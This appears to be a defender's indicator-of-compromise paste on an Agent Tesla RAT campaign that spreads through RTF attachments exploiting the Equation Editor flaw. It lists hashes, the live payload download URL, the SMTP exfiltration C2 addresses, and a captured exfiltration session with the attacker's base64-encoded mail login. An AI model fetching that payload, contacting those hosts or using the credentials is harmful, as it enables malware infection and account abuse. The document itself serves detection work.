#IOC #OptiData #VR #agenttesla #RAT #RTF #11882
https://pastebin.com/zhJvDz8M
previous_contact:
09/01/19 https://pastebin.com/MdDfZDdb
16/10/18 https://pastebin.com/d5DxTRrB
04/10/18 https://pastebin.com/JYShuXn4
11/10/18 https://pastebin.com/bkCSvJvM
FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_agenttesla_111018/
attack_vector
--------------
email attach .DOC (RTF) > EQNEDT32 > GET 1 URL > AppData\Roaming\*.exe
email_headers
--------------
n/a
files
--------------
SHA-256 7a1ad06997a8e82d1074ee61523b3203b57aa0c4e130c4f5366fc9e7d7738979
File name 10809A007-KOSSEN.doc [Rich Text Format data]
File size 234.5 KB (240123 bytes)
SHA-256 dde7c0ace711bce1edf7d87b761cdbfb3fc4be3e1d3736f222daece4d1abe08e
File name IMPULSE FASHION 7-12ETD VESSEL.doc [Rich Text Format data]
File size 195.98 KB (200684 bytes)
SHA-256 6f69d71d71878bd9406fb5fc4330fe3e14037ba5fdff85ff48b36619efe4a0f0
File name nwamhdk.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 881 KB (902144 bytes)
activity
**************
PL_SCR
http://alhaji.top/nwama/nwama.exe
C2 [exfiltration by SMTP]
199.79.63.211:587
199.79.63.218:587
netwrk
--------------
[http]
162.144.128.116 alhaji.top GET /nwama/nwama.exe HTTP/1.1 Mozilla/4.0
52.55.255.113 checkip.amazonaws.com GET / HTTP/1.1 no UA
[587]
199.79.63.211:587
199.79.63.218:587
comp
--------------
EQNEDT32.EXE 162.144.128.116 80 ESTABLISHED
nwamhdk.exe 52.55.255.113 80 ESTABLISHED
nwamhdk.exe 199.79.63.218 587 ESTABLISHED
nwamhdk.exe 52.55.255.113 80 ESTABLISHED
[System] 199.79.63.218 587 TIME_WAIT
[System] 199.79.63.211 587 TIME_WAIT
proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
[11882, another context]
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Users\operator\AppData\Roaming\nwamahjdg368489.exe
C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
persist
--------------
(!)no persist
drop
--------------
C:\tmp\Temporary Internet Files\Content.IE5\CD4BKOGM\nwama[1].exe
C:\Users\operator\AppData\Roaming\nwamahjdg368489.exe
C:\Users\operator\AppData\Roaming\elwmykgc.o2m.zip
C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
C:\tmp\637030277594981562_6f226394-f8e3-4089-a87b-680191fc12a0.db
SMTP exfiltration fail
--------------
220 us3.outbound.mailhostbox.com ESMTP Postfix
EHLO APM11
250-us3.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login bndhbWFAbG9ncm9vbS50b3A=
334 UGFzc3dvcmQ6
RnhnRk1BWDY=
235 2.7.0 Authentication successful
MAIL FROM:<nwama@logroom.top>
250 2.1.0 Ok
RCPT TO:<nwama@logroom.top>
550 5.4.6 <nwama@logroom.top>: Recipient address rejected: Email Sending Quota Exceeded
# # #
https://www.virustotal.com/gui/file/7a1ad06997a8e82d1074ee61523b3203b57aa0c4e130c4f5366fc9e7d7738979/details
https://www.virustotal.com/gui/file/dde7c0ace711bce1edf7d87b761cdbfb3fc4be3e1d3736f222daece4d1abe08e/details
https://www.virustotal.com/gui/file/6f69d71d71878bd9406fb5fc4330fe3e14037ba5fdff85ff48b36619efe4a0f0/details
https://analyze.intezer.com/#/analyses/f0570463-452b-42bc-99b7-2f18ade21a17
VR
@